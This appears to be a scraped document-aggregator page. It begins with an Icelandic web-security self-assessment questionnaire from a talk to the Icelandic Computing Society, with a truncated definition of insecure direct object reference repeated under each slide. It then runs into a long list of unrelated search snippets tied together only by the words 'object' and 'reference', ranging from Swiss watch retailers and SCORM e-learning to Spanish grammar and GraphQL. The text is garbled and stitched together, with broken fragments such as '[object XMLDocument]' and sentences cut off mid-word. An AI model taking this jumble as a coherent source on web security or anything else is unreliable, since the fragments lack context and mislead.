¡  1. Hvaða upplýsingar eru hýstar í veflausn §  Upplýsingar aðgengilegar almenningi §  Upplýsingar um notendur vefsíðunnar §  Viðkvæmar upplýsingar s.s. korta og persónugerandi upplýsingar

¡  2. Hvaða þ jónusta er veitt í veflausn §  Einföld vefsíða, upplýsingaveita §  Einhver virkni og tengingar við aðra vefsíður §  innskráning og tekur á móti á upplýsingum frá notendum

SJÁLFSMAT (1/6)

Page 66: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  3. hvernig er mið lun upplýsinga háttað §  í gegnum vefsíðu §  í gefnum vef og snjallsíma §  í gegnum vef, snjallsíma og snjallforrit

¡  4. hversu oft er efni vefsíðunnar uppfært § mánaðarlega eða sjaldnar §  vikulega §  daglega

SJÁLFSMAT (2/6)

Page 67: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  5. Umfang veflausnar §  ein stofnun §  fleiri en ein stofnun §  fleiri en ein stofnun og undir stofnanir

¡  6. hversu lengi getur stofnun starfað án veflausnar § mánuður eða lengri tími §  vika eða skemmri tími §  innan dags

SJÁLFSMAT (3/6)

Page 68: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  7. Hvernig er hýsing á vefnum háttað §  Hýst og rekið af viðkomandi stofnun §  Hýst hjá þriðjaaðila en rekið af stofnun §  Öll hýsing og rekstur útvistað

¡  8. Vefumsjónarkerfi §  Stöðluð og þekkt lausn §  Opin hugbúnaður / open source §  Sérsmíðuð lausn §  Samblanda af staðlaðri og sérsmíðaðri lausn

SJÁLFSMAT (4/6)

Page 69: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  9. Tengist vefumsjónarkerfi við ytri að i la §  Engar tengingar við ytri aðila §  Tenging til staðar við ytri aðila §  Tenging til staðar við fleiri en einn ytri aðila

¡  10. Tengist veflausn við upplýsingakerfi stofnunarinnar §  Engar tengingar við önnur kerfi §  Tenging við almenn skrifstofukerfi §  Tenging við fjárhags- og eða upplýsingakerfi

SJÁLFSMAT (5/6)

Page 70: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

¡  11. Auðkenning notenda §  Engin auðkenning notenda §  Veflausn byggir á auðkenningarþjónustu Island.is (hjá Þjóðskrá Íslands). §  Notendanafn og lykilorð

¡  12. Stærð upplýsingatæknideildar §  1 til 3 §  4 til 10 §  11+ §  Rekstri upplýsingatæknikerfa útvistað

SJÁLFSMAT (6/6)

Page 71: DAGSKRÁ - Skýrslutæknifélag Íslands“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or

Spurningar? Svavar Ingi Hermannsson, CISSP, CISA, CISM [email protected] http://www.upplysingaoryggi.is/

TAKK FYRIR


Frumgerðir með Meteor - Skýrslutæknifélag Íslands · Hvað er Meteor? • Client og Server • Node.js, NPM • MVM - Tengist gagnagrunni úr vafranum • Reactive variables

REFERENCE OBJECT: MSC RIEU, CH-1206 GENF

object oriented

mers for β - Cloud Object Storage | Store & Retrieve Data ... · 4 (used on the GenEx platform, MultiD Analyses AB, Göteborg, Sweden). Since the stability of reference transcripts

[object XMLDocument]

A Content Management Schemen of SCORM Compliant Learning ... · international organizations in recent years, and Sharable Content Object Reference Model (SCORM) is the most popular

FORMATION LOGICIELLE - UNI-Learning€¦ · format SCORM (Sharable Content Object Reference Model). La valeur ajoutée de l intégration des modules didacticiels au LMS est intéressante

REFERENCIA DIRECTA INSEGURA A OBJETOS. DEFINICION: Una referencia directa a objetos ("direct object reference") ocurre cuando un programador expone una

The Isabelle/Isar Reference ManualThe generic Isabelle/Isar framework (see chapter2) works reasonably well for any Isabelle object-logic that conforms to the natural deduction view

En este número UN RETO PERMANENTE - kimerius.comn+de... · El primero de los dos artículos, "Proposal for a reference Federation Object Model (FOM). A Common interoperability model

Direct Object Pronouns - Woodland Hills School District · Direct Object Pronouns le replaces a masculine singular direct object noun. la replaces a feminine singular direct object

OBJECT - bedrijfspand

REFERENCE OBJECT: VACHERON CONSTANTIN · 2021. 1. 14. · REFERENCE OBJECT: VACHERON CONSTANTIN Products SI LV ER TA K 7 4/2und Reference Object Vacheron Constantin CH-1347 Le Chenit

ODMG Object Model, Object Definition Language (ODL)

OBJECT PASCAL

Object based

GraphQL - Skýrslutæknifélag Íslands · GraphQL foundation undir Linux foundation Stofnmeðlimir: Airbnb, Apollo, Coursera, Facebook, Github, Shopify, Twitter ofl. ... REST Vefþjónustur

OBJECTS OBJECT IDENTITY REFERENCE TYPES

Dynamic Object Scanning: Object-Based Elastic Timeline for ...18-LBW... · Dynamic Object Scanning: Object-Based Elastic Timeline for Quickly Browsing First-Person Videos Seita Kayukawa

REFERENCE OBJECT: MFH STEINER, CH-4600 OLTEN · 2020. 11. 15. · REFERENCE OBJECT: MFH STEINER, CH-4600 OLTEN Products SWISSDUREX DECO BRUSH SWISSCULINARIA Küchenrückwände SWISSCULINARIA

Posar framtíðin? - Skýrslutæknifélag Íslands › images › stories › 2018_SkjolOgMyndir › 22... · •Uppgjör í íslenskri mynt •Forritaður fyrir samskipti við færslumiðlara

Andromeda: XSSpcousot/publications.www/slides-public/SlidesFA… · Injection flaws 3. Malicious file executions 4. Insecure direct object reference 5. Cross site request forgery

Warranty Management - Fast Start - websmp106.sap-ag.desapidp/011000358700001066462013E/... · easy implementation of SAP Warranty Management (WTY). ... Reference object and object

REFERENCE 227 REFERENCE - Amazon Web Servicespdf.blucher.com.br.s3-sa-east-1.amazonaws.com/openaccess/roadmap... · REFERENCE 227 REFERENCE ABNT – ASSOCIAÇÃO BRASILEIRA DE NORMAS

SistemInformasiFILKOM UB Semester …€¢Ketika kita mencoba memanggil method getName dari reference Person ref, method getNamedari object Student akan dipanggil. •Sekarang, jika

REFERENCE OBJECT: VACHERON CONSTANTIN, CH-1347 LE … · 2021. 1. 25. · Products SI LV ER TA K 7 4/ 2und Reference Object Vacheron Constantin CH-1347 Le Chenit Glas SILVERSTAR SELEKT

xAPI / LRS cmi5...Copyright (c) 2016 GingerApp Company All rights reserved. P. 4 SCORM(The Sharable Content Object Reference Model )は、ADL(Advanced

LOG4OM Amateur Radio Software · Award code MY_AWARD_2 DXCC at header level = ITALY DXCC at reference level: REFERENCE 1: ITALY REFERENCE 2: ITALY REFERENCE 3: ITALY REFERENCE 4:

E VERIFY REFERENCE GUIDE - OU Human Resources response object added: EmpGetSupportingDocumentTypesResp.....48 New method added: EmpGetIssuingAuthorities

[object Document]

SCale-out Application Reference Architecture (SCARA)kosta.or.kr/mail/2014/download/Track3-6_2014Architect.pdf · 서비스명 Tumblr 서비스개요 ... WEB/WAS/DB구조, Object Storage

PESEE IERE · 2020. 2. 21. · FN10 FN12 REFERENCE REFERENCE REFERENCE REFERENCE REFERENCE REFERENCE MB 02 REFERENCE REFERENCE MX01 ATT3 ATT2 ATT1 DESIGNATION CODE ATT3 ATT2 ATT1

type object

Deferred object

Servicios Extendidos Sobre la Plataforma de Enseñanza ...campusv.uaem.mx/cicos/imagenes/memorias/8vocicos2011/Articulos/... · a lecciones Scorm (Sharable Content Object Reference